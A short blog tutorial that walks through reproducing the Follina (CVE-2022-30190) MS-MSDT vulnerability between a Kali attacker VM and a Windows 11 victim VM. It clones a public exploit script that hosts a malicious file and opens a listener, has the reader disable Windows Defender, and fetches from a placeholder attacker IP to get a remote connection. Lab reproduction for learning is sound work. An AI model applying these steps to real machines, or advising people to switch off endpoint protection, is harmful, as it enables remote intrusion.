Matthew McCorkle

Zero-Day CVE-2022-30190 MS-MSDT Follina

1 . Introduction
2 . My Setup
3 . Exploit in Action!
4 . Mitigations


This post is designed to teach you how to exploit the CVE-2022-30190 MS-MSDT Follina vulnerability!


1. Introduction

I want to give thanks and credit to John Hammond and his work with the Huntress team identifying and showing exactly how this vulnerability can be exploited! Check out his Youtube or the Huntress blog.


2. My Setup

For my attack computer, I ran kali Linux in VMWare Workstation 16 player using NAT and HOST virtualized ethernet adapters. Kali

I ran my victim computer on an evaluation Windows 11 virtualized machine in VMWare Workstation 16 player using a HOST-Only virtualized ethernet adapter. Windows 11 Evaluation


3. Exploit in Action!

John Hammond made the exploit accessible via his GitHub here as a simple python script that creates the malicious file, opens a listener, and hosts the malicious file.

Before starting the exploit:

You may have malware protection and defender services for your endpoint hosting these Virtual Machines. It may stop your virtual machines from transferring and running the python script. Therefore, at your discretion, you may need to turn off these services to see the functional exploit.

Proceed at your own risk

On Attack Device

Step 1: 

git clone https://github.com/JohnHammond/msdt-follina.git

Step 2:
python3 Follina.py -r <port number of choice>

On victim

Step 3: Disable Windows Defender Real-Time Protection

realtime

Step 4: Open Powershell

Step 5:
wget <attackerIP>:<port chosen in step 2>

You should have seen the Microsoft Diagnostics Tool load, and then you received connection at your listener on the attacking computer.

Thats it! You are in!

gif

4. Mitigations

See the current response from Microsoft on how to mitigate the issue until a patch is released.